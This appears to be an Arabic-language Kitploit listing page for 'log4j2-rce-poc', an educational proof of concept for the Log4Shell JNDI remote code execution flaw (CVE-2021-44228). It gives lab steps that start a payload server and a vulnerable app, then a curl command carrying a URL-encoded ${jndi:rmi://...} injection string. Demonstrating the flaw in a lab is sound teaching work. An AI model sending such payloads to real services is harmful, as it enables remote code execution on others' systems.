Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
log4j2-rce-poc — أقل دليل إثبات للمفهوم لثغرة Log4j2 JNDI RCE (CVE-2021-44228/Log4Shell). | Kitploit
أدوات/GitHubGitHub/unlimitedsola/log4j2-rce-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليمأداة الوصول عن بعد
GitHubunlimitedsola/log4j2-rce-poc

log4j2-rce-poc

أقل دليل إثبات للمفهوم لثغرة Log4j2 JNDI RCE (CVE-2021-44228/Log4Shell).

عرض المستودع
32منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات مفهوم ثغرة تنفيذ الأوامر عن بعد في Log4j2

إثبات مفهوم بسيط لثغرة تنفيذ الأوامر عن بعد عبر JNDI في Log4j2 (CVE-2021-44228). هذا مخصص للأغراض التعليمية لمساعدة الأشخاص غير المتخصصين في أمن المعلومات على فهم كيفية عملها ومدى تأثيرها.

يتجاوز هذا الإثبات شرط تعيين الخصائص com.sun.jndi.rmi.object.trustURLCodebase و com.sun.jndi.cosnaming.object.trustURLCodebase إلى true والتي تم تعطيلها افتراضيًا منذ الإصدارات 8u121 و7u131 و6u141.

المتطلبات الأساسية

  • JDK 1.8

ملاحظة: يتطلب JDK 1.8 لتجميع payload-server، لكن victim-app معرض للخطر حتى JDK 15 لأن [محرك Nashorn تمت إزالته في JDK 15][].

للاختبار

  1. ابدأ تشغيل payload-server بتشغيل الأمر:
root@kitploit:~
$ ./gradlew runPayloadServer
  1. افتح جلسة طرفية جديدة ثم ابدأ تشغيل victim-app:
root@kitploit:~
$ ./gradlew runVictimApp
  1. قم بتشغيل الأمر curl http://localhost:8080/hello?name=%24%7Bjndi%3Armi%3A%2F%2F127.0.0.1%3A8099%2Fexec%7D لتشغيل تنفيذ الأوامر عن بعد.

  2. لإثبات تنفيذ الأوامر عن بعد، تحقق من سجل وحدة التحكم لـ victim-app. يجب أن ترى سجلًا غير مقصود قد طُبع على الشاشة.

تنزيل الأداة